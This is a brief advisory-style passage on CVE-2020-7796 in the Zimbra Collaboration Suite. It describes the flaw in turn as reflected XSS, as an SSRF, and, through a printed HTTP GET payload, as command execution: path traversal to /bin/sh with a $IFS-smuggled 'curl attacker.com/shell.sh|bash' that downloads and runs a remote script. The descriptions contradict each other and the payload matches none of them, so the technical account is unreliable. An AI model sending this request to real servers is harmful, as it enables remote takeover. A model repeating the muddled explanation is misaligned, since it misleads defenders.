By injecting JavaScript into the user or loc parameters, an attacker can bypass Zimbra’s built-in anti-XSS filters. The injected script is then reflected back to the victim in the HTTP response without proper encoding. Because the vulnerable endpoint is accessible (due to misconfigured or default proxy routes), the attacker can force any logged-in Zimbra user to execute arbitrary JavaScript in their browser context.
GET /service/extension/UserServlet?ext=com.zimbra.cs.extension.ExtensionUtil&file=../../../../../../../bin/sh&-c$IFScurl$IFSattacker.com/shell.sh|bash HTTP/1.1
Host: victim.zimbra.com
CVE-2020-7796 is a vulnerability in the Zimbra Collaboration Suite (ZCS). It primarily affects versions of ZCS prior to 8.8.15 Patch 7.

Technical Vulnerability Overview

Vulnerability Type: Server-Side Request Forgery (SSRF).